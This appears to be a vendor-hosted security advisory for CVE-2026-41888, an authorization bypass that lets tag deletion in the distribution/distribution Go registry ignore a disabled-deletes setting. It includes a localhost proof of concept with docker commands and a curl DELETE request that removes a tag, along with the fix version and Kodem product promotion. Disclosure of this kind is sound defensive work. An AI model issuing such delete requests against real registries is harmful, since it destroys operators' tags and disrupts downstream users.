CVE-2026-41888

CVE-2026-41888 is a medium-severity incorrect authorization vulnerability in github.com/distribution/distribution/v3 (go), affecting versions < 3.1.1. It is fixed in 3.1.1.

Summary

Tag deletion via the DELETE /v2/<name>/manifests/<tag> endpoint bypasses the storage.delete.enabled: false configuration, allowing any API client to remove tags from repositories even when the operator has explicitly disabled deletion.

Details

When storage.delete.enabled is configured to false, digest-based manifest deletion is correctly rejected by the guard in registry/storage/linkedblobstore.go:212-215.

However, tag deletion takes a separate code path that never checks this setting:

In registry/handlers/manifests.go:439-453, DeleteManifest detects a tag reference, calls tagService.Untag(), returns, never consulting registry.deleteEnabled.

In turn, tagStore.Untag() calls the storage driver directly to delete the tag path without checking whether deletes are enabled.

PoC

Using a paired down Distribution configuration that explicitly disables deletes, such as this one, stored as config.yaml:

version: 0.1
storage:
  delete:
    enabled: false
  filesystem:
    rootdirectory: /var/lib/registry
http:
  addr: :5000

Start a local Distribution, mounting in the above configuration from the current directory:

docker run -p 5000:5000 -v "$(pwd)/config.yaml":/config.yaml --restart=always --name registry registry:3.1.0 /config.yaml

In a separate terminal session/tab, push alpine:3.23 into the running instance:

docker pull alpine:3.23
docker tag alpine:3.23 localhost:5000/alpine:3.23
docker push localhost:5000/alpine:3.23

Confirm that the tag shows up as expected:

curl 'http://localhost:5000/v2/alpine/tags/list'
{"name":"alpine","tags":["3.23"]}

Issue a delete for the 3.23 tag:

curl -X DELETE 'http://localhost:5000/v2/alpine/manifests/3.23'

Observe that the tag is now gone, despite deletes being disabled:

curl 'http://localhost:5000/v2/alpine/tags/list'
{"name":"alpine","tags":null}

Impact

This is an authorization bypass vulnerability. Any client with network access to the registry can delete tags despite the operator having disabled deletion. This can cause denial of service for consumers pulling by tag and enables supply-chain disruption by removing trusted tags from a registry that the operator and/or users believed to be immutable.

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

Affected versions

github.com/distribution/distribution/v3 (< 3.1.1) github.com/distribution/distribution (<= 2.8.3)

Security releases

github.com/distribution/distribution/v3 → 3.1.1 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/distribution/distribution/v3 to 3.1.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41888? CVE-2026-41888 is a medium-severity incorrect authorization vulnerability in github.com/distribution/distribution/v3 (go), affecting versions < 3.1.1. It is fixed in 3.1.1. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. Which packages are affected by CVE-2026-41888?
    • github.com/distribution/distribution/v3 (go) (versions < 3.1.1)
    • github.com/distribution/distribution (go) (versions <= 2.8.3)
  3. Is there a fix for CVE-2026-41888? Yes. CVE-2026-41888 is fixed in 3.1.1. Upgrade to this version or later.
  4. Is CVE-2026-41888 exploitable, and should I be worried? Whether CVE-2026-41888 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-41888 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-41888? Upgrade github.com/distribution/distribution/v3 to 3.1.1 or later.

Other vulnerabilities in github.com/distribution/distribution/v3

CVE-2026-41888CVE-2026-33540CVE-2025-24976

Stop the waste.
Protect your environment with Kodem.